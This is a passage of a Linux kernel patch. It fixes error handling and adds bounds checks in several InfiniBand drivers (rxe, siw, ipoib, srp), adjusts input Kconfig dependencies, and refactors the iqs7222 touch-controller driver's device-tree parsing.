+ 	umem = ib_umem_get(&rxe->ib_dev, start, length, access);
+ 	if (IS_ERR(umem)) {
+@@ -163,9 +163,8 @@ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 				pr_warn("%s: Unable to get virtual address\n",
+ 						__func__);
+ 				err = -ENOMEM;
+-				goto err_cleanup_map;
++				goto err_release_umem;
+ 			}
+-
+ 			buf->addr = (uintptr_t)vaddr;
+ 			buf->size = PAGE_SIZE;
+ 			num_buf++;
+@@ -182,10 +181,6 @@ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 
+ 	return 0;
+ 
+-err_cleanup_map:
+-	for (i = 0; i < mr->num_map; i++)
+-		kfree(mr->map[i]);
+-	kfree(mr->map);
+ err_release_umem:
+ 	ib_umem_release(umem);
+ err_out:
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index a62bab88415cb..e459fb542b83a 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -829,12 +829,12 @@ static void rxe_qp_do_cleanup(struct work_struct *work)
+ 	if (qp->resp.mr)
+ 		rxe_put(qp->resp.mr);
+ 
+-	if (qp_type(qp) == IB_QPT_RC)
+-		sk_dst_reset(qp->sk->sk);
+-
+ 	free_rd_atomic_resources(qp);
+ 
+ 	if (qp->sk) {
++		if (qp_type(qp) == IB_QPT_RC)
++			sk_dst_reset(qp->sk->sk);
++
+ 		kernel_sock_shutdown(qp->sk, SHUT_RDWR);
+ 		sock_release(qp->sk);
+ 	}
+diff --git a/drivers/infiniband/sw/siw/siw_cq.c b/drivers/infiniband/sw/siw/siw_cq.c
+index d68e37859e73b..403029de6b92d 100644
+--- a/drivers/infiniband/sw/siw/siw_cq.c
++++ b/drivers/infiniband/sw/siw/siw_cq.c
+@@ -56,8 +56,6 @@ int siw_reap_cqe(struct siw_cq *cq, struct ib_wc *wc)
+ 	if (READ_ONCE(cqe->flags) & SIW_WQE_VALID) {
+ 		memset(wc, 0, sizeof(*wc));
+ 		wc->wr_id = cqe->id;
+-		wc->status = map_cqe_status[cqe->status].ib;
+-		wc->opcode = map_wc_opcode[cqe->opcode];
+ 		wc->byte_len = cqe->bytes;
+ 
+ 		/*
+@@ -71,10 +69,32 @@ int siw_reap_cqe(struct siw_cq *cq, struct ib_wc *wc)
+ 				wc->wc_flags = IB_WC_WITH_INVALIDATE;
+ 			}
+ 			wc->qp = cqe->base_qp;
++			wc->opcode = map_wc_opcode[cqe->opcode];
++			wc->status = map_cqe_status[cqe->status].ib;
+ 			siw_dbg_cq(cq,
+ 				   "idx %u, type %d, flags %2x, id 0x%pK\n",
+ 				   cq->cq_get % cq->num_cqe, cqe->opcode,
+ 				   cqe->flags, (void *)(uintptr_t)cqe->id);
++		} else {
++			/*
++			 * A malicious user may set invalid opcode or
++			 * status in the user mmapped CQE array.
++			 * Sanity check and correct values in that case
++			 * to avoid out-of-bounds access to global arrays
++			 * for opcode and status mapping.
++			 */
++			u8 opcode = cqe->opcode;
++			u16 status = cqe->status;
++
++			if (opcode >= SIW_NUM_OPCODES) {
++				opcode = 0;
++				status = SIW_WC_GENERAL_ERR;
++			} else if (status >= SIW_NUM_WC_STATUS) {
++				status = SIW_WC_GENERAL_ERR;
++			}
++			wc->opcode = map_wc_opcode[opcode];
++			wc->status = map_cqe_status[status].ib;
++
+ 		}
+ 		WRITE_ONCE(cqe->flags, 0);
+ 		cq->cq_get++;
+diff --git a/drivers/infiniband/sw/siw/siw_qp_tx.c b/drivers/infiniband/sw/siw/siw_qp_tx.c
+index 7d47b521070b1..05052b49107f2 100644
+--- a/drivers/infiniband/sw/siw/siw_qp_tx.c
++++ b/drivers/infiniband/sw/siw/siw_qp_tx.c
+@@ -29,7 +29,7 @@ static struct page *siw_get_pblpage(struct siw_mem *mem, u64 addr, int *idx)
+ 	dma_addr_t paddr = siw_pbl_get_buffer(pbl, offset, NULL, idx);
+ 
+ 	if (paddr)
+-		return virt_to_page((void *)paddr);
++		return virt_to_page((void *)(uintptr_t)paddr);
+ 
+ 	return NULL;
+ }
+diff --git a/drivers/infiniband/sw/siw/siw_verbs.c b/drivers/infiniband/sw/siw/siw_verbs.c
+index 3e814cfb298cf..906fde1a2a0de 100644
+--- a/drivers/infiniband/sw/siw/siw_verbs.c
++++ b/drivers/infiniband/sw/siw/siw_verbs.c
+@@ -676,13 +676,45 @@ static int siw_copy_inline_sgl(const struct ib_send_wr *core_wr,
+ static int siw_sq_flush_wr(struct siw_qp *qp, const struct ib_send_wr *wr,
+ 			   const struct ib_send_wr **bad_wr)
+ {
+-	struct siw_sqe sqe = {};
+ 	int rv = 0;
+ 
+ 	while (wr) {
+-		sqe.id = wr->wr_id;
+-		sqe.opcode = wr->opcode;
+-		rv = siw_sqe_complete(qp, &sqe, 0, SIW_WC_WR_FLUSH_ERR);
++		struct siw_sqe sqe = {};
++
++		switch (wr->opcode) {
++		case IB_WR_RDMA_WRITE:
++			sqe.opcode = SIW_OP_WRITE;
++			break;
++		case IB_WR_RDMA_READ:
++			sqe.opcode = SIW_OP_READ;
++			break;
++		case IB_WR_RDMA_READ_WITH_INV:
++			sqe.opcode = SIW_OP_READ_LOCAL_INV;
++			break;
++		case IB_WR_SEND:
++			sqe.opcode = SIW_OP_SEND;
++			break;
++		case IB_WR_SEND_WITH_IMM:
++			sqe.opcode = SIW_OP_SEND_WITH_IMM;
++			break;
++		case IB_WR_SEND_WITH_INV:
++			sqe.opcode = SIW_OP_SEND_REMOTE_INV;
++			break;
++		case IB_WR_LOCAL_INV:
++			sqe.opcode = SIW_OP_INVAL_STAG;
++			break;
++		case IB_WR_REG_MR:
++			sqe.opcode = SIW_OP_REG_MR;
++			break;
++		default:
++			rv = -EINVAL;
++			break;
++		}
++		if (!rv) {
++			sqe.id = wr->wr_id;
++			rv = siw_sqe_complete(qp, &sqe, 0,
++					      SIW_WC_WR_FLUSH_ERR);
++		}
+ 		if (rv) {
+ 			if (bad_wr)
+ 				*bad_wr = wr;
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_netlink.c b/drivers/infiniband/ulp/ipoib/ipoib_netlink.c
+index ea16ba5d8da6c..9ad8d98562752 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_netlink.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_netlink.c
+@@ -41,6 +41,11 @@ static const struct nla_policy ipoib_policy[IFLA_IPOIB_MAX + 1] = {
+ 	[IFLA_IPOIB_UMCAST]	= { .type = NLA_U16 },
+ };
+ 
++static unsigned int ipoib_get_max_num_queues(void)
++{
++	return min_t(unsigned int, num_possible_cpus(), 128);
++}
++
+ static int ipoib_fill_info(struct sk_buff *skb, const struct net_device *dev)
+ {
+ 	struct ipoib_dev_priv *priv = ipoib_priv(dev);
+@@ -172,6 +177,8 @@ static struct rtnl_link_ops ipoib_link_ops __read_mostly = {
+ 	.changelink	= ipoib_changelink,
+ 	.get_size	= ipoib_get_size,
+ 	.fill_info	= ipoib_fill_info,
++	.get_num_rx_queues = ipoib_get_max_num_queues,
++	.get_num_tx_queues = ipoib_get_max_num_queues,
+ };
+ 
+ struct rtnl_link_ops *ipoib_get_link_ops(void)
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.c b/drivers/infiniband/ulp/srp/ib_srp.c
+index 1075c2ac8fe20..b4d6a4a5ae81e 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.c
++++ b/drivers/infiniband/ulp/srp/ib_srp.c
+@@ -3410,7 +3410,8 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_PKEY:
+-			if (match_hex(args, &token)) {
++			ret = match_hex(args, &token);
++			if (ret) {
+ 				pr_warn("bad P_Key parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3470,7 +3471,8 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_MAX_SECT:
+-			if (match_int(args, &token)) {
++			ret = match_int(args, &token);
++			if (ret) {
+ 				pr_warn("bad max sect parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3478,8 +3480,15 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_QUEUE_SIZE:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for queue_size parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad queue_size parameter '%s'\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->scsi_host->can_queue = token;
+@@ -3490,25 +3499,40 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_MAX_CMD_PER_LUN:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max cmd_per_lun parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad max cmd_per_lun parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->scsi_host->cmd_per_lun = token;
+ 			break;
+ 
+ 		case SRP_OPT_TARGET_CAN_QUEUE:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max target_can_queue parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad max target_can_queue parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->target_can_queue = token;
+ 			break;
+ 
+ 		case SRP_OPT_IO_CLASS:
+-			if (match_hex(args, &token)) {
++			ret = match_hex(args, &token);
++			if (ret) {
+ 				pr_warn("bad IO class parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3517,6 +3541,7 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 				pr_warn("unknown IO class parameter value %x specified (use %x or %x).\n",
+ 					token, SRP_REV10_IB_IO_CLASS,
+ 					SRP_REV16A_IB_IO_CLASS);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->io_class = token;
+@@ -3539,16 +3564,24 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_CMD_SG_ENTRIES:
+-			if (match_int(args, &token) || token < 1 || token > 255) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max cmd_sg_entries parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1 || token > 255) {
+ 				pr_warn("bad max cmd_sg_entries parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->cmd_sg_cnt = token;
+ 			break;
+ 
+ 		case SRP_OPT_ALLOW_EXT_SG:
+-			if (match_int(args, &token)) {
++			ret = match_int(args, &token);
++			if (ret) {
+ 				pr_warn("bad allow_ext_sg parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3556,43 +3589,77 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_SG_TABLESIZE:
+-			if (match_int(args, &token) || token < 1 ||
+-					token > SG_MAX_SEGMENTS) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max sg_tablesize parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1 || token > SG_MAX_SEGMENTS) {
+ 				pr_warn("bad max sg_tablesize parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->sg_tablesize = token;
+ 			break;
+ 
+ 		case SRP_OPT_COMP_VECTOR:
+-			if (match_int(args, &token) || token < 0) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for comp_vector parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 0) {
+ 				pr_warn("bad comp_vector parameter '%s'\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->comp_vector = token;
+ 			break;
+ 
+ 		case SRP_OPT_TL_RETRY_COUNT:
+-			if (match_int(args, &token) || token < 2 || token > 7) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for tl_retry_count parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 2 || token > 7) {
+ 				pr_warn("bad tl_retry_count parameter '%s' (must be a number between 2 and 7)\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->tl_retry_count = token;
+ 			break;
+ 
+ 		case SRP_OPT_MAX_IT_IU_SIZE:
+-			if (match_int(args, &token) || token < 0) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max it_iu_size parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 0) {
+ 				pr_warn("bad maximum initiator to target IU size '%s'\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->max_it_iu_size = token;
+ 			break;
+ 
+ 		case SRP_OPT_CH_COUNT:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for channel count parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad channel count %s\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->ch_count = token;
+@@ -3601,6 +3668,7 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 		default:
+ 			pr_warn("unknown parameter or missing value '%s' in target creation request\n",
+ 				p);
++			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 	}
+diff --git a/drivers/input/joystick/Kconfig b/drivers/input/joystick/Kconfig
+index 9dcf3f51f2dd9..04ca3d1c28162 100644
+--- a/drivers/input/joystick/Kconfig
++++ b/drivers/input/joystick/Kconfig
+@@ -46,6 +46,7 @@ config JOYSTICK_A3D
+ config JOYSTICK_ADC
+ 	tristate "Simple joystick connected over ADC"
+ 	depends on IIO
++	select IIO_BUFFER
+ 	select IIO_BUFFER_CB
+ 	help
+ 	  Say Y here if you have a simple joystick connected over ADC.
+diff --git a/drivers/input/misc/Kconfig b/drivers/input/misc/Kconfig
+index 9f088900f863b..fa942651619d2 100644
+--- a/drivers/input/misc/Kconfig
++++ b/drivers/input/misc/Kconfig
+@@ -330,7 +330,7 @@ config INPUT_CPCAP_PWRBUTTON
+ 
+ config INPUT_WISTRON_BTNS
+ 	tristate "x86 Wistron laptop button interface"
+-	depends on X86_32
++	depends on X86_32 && !UML
+ 	select INPUT_SPARSEKMAP
+ 	select NEW_LEDS
+ 	select LEDS_CLASS
+diff --git a/drivers/input/misc/iqs7222.c b/drivers/input/misc/iqs7222.c
+index ddb863bf63eec..e47ab6c1177f5 100644
+--- a/drivers/input/misc/iqs7222.c
++++ b/drivers/input/misc/iqs7222.c
+@@ -86,7 +86,9 @@ enum iqs7222_reg_key_id {
+ 	IQS7222_REG_KEY_TOUCH,
+ 	IQS7222_REG_KEY_DEBOUNCE,
+ 	IQS7222_REG_KEY_TAP,
++	IQS7222_REG_KEY_TAP_LEGACY,
+ 	IQS7222_REG_KEY_AXIAL,
++	IQS7222_REG_KEY_AXIAL_LEGACY,
+ 	IQS7222_REG_KEY_WHEEL,
+ 	IQS7222_REG_KEY_NO_WHEEL,
+ 	IQS7222_REG_KEY_RESERVED
+@@ -105,14 +107,14 @@ enum iqs7222_reg_grp_id {
+ 	IQS7222_NUM_REG_GRPS
+ };
+ 
+-static const char * const iqs7222_reg_grp_names[] = {
++static const char * const iqs7222_reg_grp_names[IQS7222_NUM_REG_GRPS] = {
+ 	[IQS7222_REG_GRP_CYCLE] = "cycle",
+ 	[IQS7222_REG_GRP_CHAN] = "channel",
+ 	[IQS7222_REG_GRP_SLDR] = "slider",
+ 	[IQS7222_REG_GRP_GPIO] = "gpio",
+ };
+ 
+-static const unsigned int iqs7222_max_cols[] = {
++static const unsigned int iqs7222_max_cols[IQS7222_NUM_REG_GRPS] = {
+ 	[IQS7222_REG_GRP_STAT] = IQS7222_MAX_COLS_STAT,
+ 	[IQS7222_REG_GRP_CYCLE] = IQS7222_MAX_COLS_CYCLE,
+ 	[IQS7222_REG_GRP_GLBL] = IQS7222_MAX_COLS_GLBL,
+@@ -202,10 +204,68 @@ struct iqs7222_dev_desc {
+ 	int allow_offset;
+ 	int event_offset;
+ 	int comms_offset;
++	bool legacy_gesture;
+ 	struct iqs7222_reg_grp_desc reg_grps[IQS7222_NUM_REG_GRPS];
+ };
+ 
+ static const struct iqs7222_dev_desc iqs7222_devs[] = {
++	{
++		.prod_num = IQS7222_PROD_NUM_A,
++		.fw_major = 1,
++		.fw_minor = 13,
++		.sldr_res = U8_MAX * 16,
++		.touch_link = 1768,
++		.allow_offset = 9,
++		.event_offset = 10,
++		.comms_offset = 12,
++		.reg_grps = {
++			[IQS7222_REG_GRP_STAT] = {
++				.base = IQS7222_SYS_STATUS,
++				.num_row = 1,
++				.num_col = 8,
++			},
++			[IQS7222_REG_GRP_CYCLE] = {
++				.base = 0x8000,
++				.num_row = 7,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_GLBL] = {
++				.base = 0x8700,
++				.num_row = 1,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_BTN] = {
++				.base = 0x9000,
++				.num_row = 12,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_CHAN] = {
++				.base = 0xA000,
++				.num_row = 12,
++				.num_col = 6,
++			},
++			[IQS7222_REG_GRP_FILT] = {
++				.base = 0xAC00,
++				.num_row = 1,
++				.num_col = 2,
++			},
++			[IQS7222_REG_GRP_SLDR] = {
++				.base = 0xB000,
++				.num_row = 2,
++				.num_col = 11,
++			},
++			[IQS7222_REG_GRP_GPIO] = {
++				.base = 0xC000,
++				.num_row = 1,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_SYS] = {
++				.base = IQS7222_SYS_SETUP,
++				.num_row = 1,
++				.num_col = 13,
++			},
++		},
++	},
+ 	{
+ 		.prod_num = IQS7222_PROD_NUM_A,
+ 		.fw_major = 1,
+@@ -215,6 +275,7 @@ static const struct iqs7222_dev_desc iqs7222_devs[] = {
+ 		.allow_offset = 9,
+ 		.event_offset = 10,
+ 		.comms_offset = 12,
++		.legacy_gesture = true,
+ 		.reg_grps = {
+ 			[IQS7222_REG_GRP_STAT] = {
+ 				.base = IQS7222_SYS_STATUS,
+@@ -874,6 +935,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.reg_offset = 9,
+ 		.reg_shift = 8,
+ 		.reg_width = 8,
++		.val_pitch = 16,
++		.label = "maximum gesture time",
++	},
++	{
++		.name = "azoteq,gesture-max-ms",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_TAP_LEGACY,
++		.reg_offset = 9,
++		.reg_shift = 8,
++		.reg_width = 8,
+ 		.val_pitch = 4,
+ 		.label = "maximum gesture time",
+ 	},
+@@ -884,6 +955,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.reg_offset = 9,
+ 		.reg_shift = 3,
+ 		.reg_width = 5,
++		.val_pitch = 16,
++		.label = "minimum gesture time",
++	},
++	{
++		.name = "azoteq,gesture-min-ms",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_TAP_LEGACY,
++		.reg_offset = 9,
++		.reg_shift = 3,
++		.reg_width = 5,
+ 		.val_pitch = 4,
+ 		.label = "minimum gesture time",
+ 	},
+@@ -897,6 +978,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.val_pitch = 16,
+ 		.label = "gesture distance",
+ 	},
++	{
++		.name = "azoteq,gesture-dist",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_AXIAL_LEGACY,
++		.reg_offset = 10,
++		.reg_shift = 8,
++		.reg_width = 8,
++		.val_pitch = 16,
++		.label = "gesture distance",
++	},
+ 	{
+ 		.name = "azoteq,gesture-max-ms",
+ 		.reg_grp = IQS7222_REG_GRP_SLDR,
+@@ -904,6 +995,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.reg_offset = 10,
+ 		.reg_shift = 0,
+ 		.reg_width = 8,
++		.val_pitch = 16,
++		.label = "maximum gesture time",
++	},
++	{
++		.name = "azoteq,gesture-max-ms",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_AXIAL_LEGACY,
++		.reg_offset = 10,
++		.reg_shift = 0,
++		.reg_width = 8,
+ 		.val_pitch = 4,
+ 		.label = "maximum gesture time",
+ 	},
+@@ -1567,56 +1668,17 @@ static int iqs7222_gpio_select(struct iqs7222_private *iqs7222,
+ }
+ 
+ static int iqs7222_parse_props(struct iqs7222_private *iqs7222,
+-			       struct fwnode_handle **child_node,
+-			       int child_index,
++			       struct fwnode_handle *reg_grp_node,
++			       int reg_grp_index,
+ 			       enum iqs7222_reg_grp_id reg_grp,
+ 			       enum iqs7222_reg_key_id reg_key)
+ {
+-	u16 *setup = iqs7222_setup(iqs7222, reg_grp, child_index);
++	u16 *setup = iqs7222_setup(iqs7222, reg_grp, reg_grp_index);
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *reg_grp_node;
+-	char reg_grp_name[16];
+ 	int i;
+ 
+-	switch (reg_grp) {
+-	case IQS7222_REG_GRP_CYCLE:
+-	case IQS7222_REG_GRP_CHAN:
+-	case IQS7222_REG_GRP_SLDR:
+-	case IQS7222_REG_GRP_GPIO:
+-	case IQS7222_REG_GRP_BTN:
+-		/*
+-		 * These groups derive a child node and return it to the caller
+-		 * for additional group-specific processing. In some cases, the
+-		 * child node may have already been derived.
+-		 */
+-		reg_grp_node = *child_node;
+-		if (reg_grp_node)
+-			break;
+-
+-		snprintf(reg_grp_name, sizeof(reg_grp_name), "%s-%d",
+-			 iqs7222_reg_grp_names[reg_grp], child_index);
+-
+-		reg_grp_node = device_get_named_child_node(&client->dev,
+-							   reg_grp_name);
+-		if (!reg_grp_node)
+-			return 0;
+-
+-		*child_node = reg_grp_node;
+-		break;
+-
+-	case IQS7222_REG_GRP_GLBL:
+-	case IQS7222_REG_GRP_FILT:
+-	case IQS7222_REG_GRP_SYS:
+-		/*
+-		 * These groups are not organized beneath a child node, nor are
+-		 * they subject to any additional processing by the caller.
+-		 */
+-		reg_grp_node = dev_fwnode(&client->dev);
+-		break;
+-
+-	default:
+-		return -EINVAL;
+-	}
++	if (!setup)
++		return 0;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(iqs7222_props); i++) {
+ 		const char *name = iqs7222_props[i].name;
+@@ -1686,11 +1748,66 @@ static int iqs7222_parse_props(struct iqs7222_private *iqs7222,
+ 	return 0;
+ }
+ 
+-static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222, int cycle_index)
++static int iqs7222_parse_event(struct iqs7222_private *iqs7222,
++			       struct fwnode_handle *event_node,
++			       int reg_grp_index,
++			       enum iqs7222_reg_grp_id reg_grp,
++			       enum iqs7222_reg_key_id reg_key,
++			       u16 event_enable, u16 event_link,
++			       unsigned int *event_type,
++			       unsigned int *event_code)
++{
++	struct i2c_client *client = iqs7222->client;
++	int error;
++
++	error = iqs7222_parse_props(iqs7222, event_node, reg_grp_index,
++				    reg_grp, reg_key);
++	if (error)
++		return error;
++
++	error = iqs7222_gpio_select(iqs7222, event_node, event_enable,
++				    event_link);
++	if (error)
++		return error;
++
++	error = fwnode_property_read_u32(event_node, "linux,code", event_code);
++	if (error == -EINVAL) {
++		return 0;
++	} else if (error) {
++		dev_err(&client->dev, "Failed to read %s code: %d\n",
++			fwnode_get_name(event_node), error);
++		return error;
++	}
++
++	if (!event_type) {
++		input_set_capability(iqs7222->keypad, EV_KEY, *event_code);
++		return 0;
++	}
++
++	error = fwnode_property_read_u32(event_node, "linux,input-type",
++					 event_type);
++	if (error == -EINVAL) {
++		*event_type = EV_KEY;
++	} else if (error) {
++		dev_err(&client->dev, "Failed to read %s input type: %d\n",
++			fwnode_get_name(event_node), error);
++		return error;
++	} else if (*event_type != EV_KEY && *event_type != EV_SW) {
++		dev_err(&client->dev, "Invalid %s input type: %d\n",
++			fwnode_get_name(event_node), *event_type);
++		return -EINVAL;
++	}
++
++	input_set_capability(iqs7222->keypad, *event_type, *event_code);
++
++	return 0;
++}
++
++static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222,
++			       struct fwnode_handle *cycle_node, int cycle_index)
+ {
+ 	u16 *cycle_setup = iqs7222->cycle_setup[cycle_index];
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *cycle_node = NULL;
+ 	unsigned int pins[9];
+ 	int error, count, i;
+ 
+@@ -1698,17 +1815,7 @@ static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222, int cycle_index)
+ 	 * Each channel shares a cycle with one other channel; the mapping of
+ 	 * channels to cycles is fixed. Properties defined for a cycle impact
+ 	 * both channels tied to the cycle.
+-	 */
+-	error = iqs7222_parse_props(iqs7222, &cycle_node, cycle_index,
+-				    IQS7222_REG_GRP_CYCLE,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+-	if (!cycle_node)
+-		return 0;
+-
+-	/*
++	 *
+ 	 * Unlike channels which are restricted to a select range of CRx pins
+ 	 * based on channel number, any cycle can claim any of the device's 9
+ 	 * CTx pins (CTx0-8).
+@@ -1750,11 +1857,11 @@ static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222, int cycle_index)
+ 	return 0;
+ }
+ 
+-static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
++static int iqs7222_parse_chan(struct iqs7222_private *iqs7222,
++			      struct fwnode_handle *chan_node, int chan_index)
+ {
+ 	const struct iqs7222_dev_desc *dev_desc = iqs7222->dev_desc;
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *chan_node = NULL;
+ 	int num_chan = dev_desc->reg_grps[IQS7222_REG_GRP_CHAN].num_row;
+ 	int ext_chan = rounddown(num_chan, 10);
+ 	int error, i;
+@@ -1762,15 +1869,6 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 	u16 *sys_setup = iqs7222->sys_setup;
+ 	unsigned int val;
+ 
+-	error = iqs7222_parse_props(iqs7222, &chan_node, chan_index,
+-				    IQS7222_REG_GRP_CHAN,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+-	if (!chan_node)
+-		return 0;
+-
+ 	if (dev_desc->allow_offset &&
+ 	    fwnode_property_present(chan_node, "azoteq,ulp-allow"))
+ 		sys_setup[dev_desc->allow_offset] &= ~BIT(chan_index);
+@@ -1810,8 +1908,9 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 		chan_setup[0] |= IQS7222_CHAN_SETUP_0_REF_MODE_FOLLOW;
+ 		chan_setup[4] = val * 42 + 1048;
+ 
+-		if (!fwnode_property_read_u32(chan_node, "azoteq,ref-weight",
+-					      &val)) {
++		error = fwnode_property_read_u32(chan_node, "azoteq,ref-weight",
++						 &val);
++		if (!error) {
+ 			if (val > U16_MAX) {
+ 				dev_err(&client->dev,
+ 					"Invalid %s reference weight: %u\n",
+@@ -1820,6 +1919,11 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 			}
+ 
+ 			chan_setup[5] = val;
++		} else if (error != -EINVAL) {
++			dev_err(&client->dev,
++				"Failed to read %s reference weight: %d\n",
++				fwnode_get_name(chan_node), error);
++			return error;
+ 		}
+ 
+ 		/*
+@@ -1892,21 +1996,10 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 		if (!event_node)
+ 			continue;
+ 
+-		error = iqs7222_parse_props(iqs7222, &event_node, chan_index,
+-					    IQS7222_REG_GRP_BTN,
+-					    iqs7222_kp_events[i].reg_key);
+-		if (error)
+-			return error;
+-
+-		error = iqs7222_gpio_select(iqs7222, event_node,
+-					    BIT(chan_index),
+-					    dev_desc->touch_link - (i ? 0 : 2));
+-		if (error)
+-			return error;
+-
+-		if (!fwnode_property_read_u32(event_node,
+-					      "azoteq,timeout-press-ms",
+-					      &val)) {
++		error = fwnode_property_read_u32(event_node,
++						 "azoteq,timeout-press-ms",
++						 &val);
++		if (!error) {
+ 			/*
+ 			 * The IQS7222B employs a global pair of press timeout
+ 			 * registers as opposed to channel-specific registers.
+@@ -1919,57 +2012,31 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 			if (val > U8_MAX * 500) {
+ 				dev_err(&client->dev,
+ 					"Invalid %s press timeout: %u\n",
+-					fwnode_get_name(chan_node), val);
++					fwnode_get_name(event_node), val);
++				fwnode_handle_put(event_node);
+ 				return -EINVAL;
+ 			}
+ 
+ 			*setup &= ~(U8_MAX << i * 8);
+ 			*setup |= (val / 500 << i * 8);
+-		}
+-
+-		error = fwnode_property_read_u32(event_node, "linux,code",
+-						 &val);
+-		if (error) {
+-			dev_err(&client->dev, "Failed to read %s code: %d\n",
+-				fwnode_get_name(chan_node), error);
++		} else if (error != -EINVAL) {
++			dev_err(&client->dev,
++				"Failed to read %s press timeout: %d\n",
++				fwnode_get_name(event_node), error);
++			fwnode_handle_put(event_node);
+ 			return error;
+ 		}
+ 
+-		iqs7222->kp_code[chan_index][i] = val;
